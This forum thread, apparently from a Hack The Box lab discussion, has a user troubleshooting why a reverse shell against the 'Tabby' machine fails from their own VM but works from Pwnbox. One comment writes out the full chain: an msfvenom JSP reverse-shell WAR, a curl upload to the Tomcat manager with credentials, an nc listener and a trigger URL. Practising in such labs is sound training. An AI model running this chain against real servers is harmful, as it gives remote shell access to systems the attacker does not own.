Question about the deployed reverse shell not working on my PC, while working while at PWNBOX.

jotunRjotunR
in Machines

Hello there!

I have a VIP+ membership/.

While on pwnbox, I can successfully deploy the reverse shell (on the tabby machine). While on my PC (even when I have succesfully connected to OpenVPN), I can not . It just hangs in there (Listening to any port), but it's never able to connect, even if I trigger it, by entering the proper URL via a browser. Again, it's totally working while on PWNBOX.

Does anybody know anything about that difference?

Is there a chance I might have something wrong on my end? For example, Bridged or Nat connection in the VM I use, or my antivirus/router blocking something? I can't understand why it works on pwnbox, but not on my VM-Kali Linux machine.

Comments

  • jotunRjotunR

    For reference, my commands for the shell are the following:

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=MY_IP LPORT=9001 -f war > test.war

    curl --user 'tomcat:$3************123!' --upload-file test.war http://10.10.10.194:8080//manager/text/deploy?path=/test.war

    nc -lnvp 9001

    Via a browser: http://10.10.10.194:8080/test.war

    In pwnbox it works, while on my PC it does not.

  • TazWakeTazWake

    @jotunr said:

    Does anybody know anything about that difference?

    The two most likely reasons are:

    • You've used the wrong IP in the msfvenom syntax
    • You have a firewall on your VM or host which is blocking the traffic (or host AV is dropping it)

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

    Currently have very limited HTB time but will try to respond as quickly as possible.

  • jotunRjotunR

    I have the correct IP, so that leaves us with the other option.
    I am thinking of disabling my antivirus, but isn't there a security concern? I hope not.

  • TazWakeTazWake

    @jotunr said:

    I have the correct IP, so that leaves us with the other option.
    I am thinking of disabling my antivirus, but isn't there a security concern? I hope not.

    It depends, no one else can threat model this for you.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

    Currently have very limited HTB time but will try to respond as quickly as possible.

  • HomeSenHomeSen
    Can you connect to you netcat listener from your host system?
    Maybe try opening the address+port in your browser `http://<ip-of-your-kali-vm-NOT-THE-VPN-ADDRESS>:9001/`
    If that doesn’t work, check your Kali's firewall (iptables, nftables, whatever)

    Hack The Box
    GREM | OSCE | GASF | eJPT

Sign In to comment.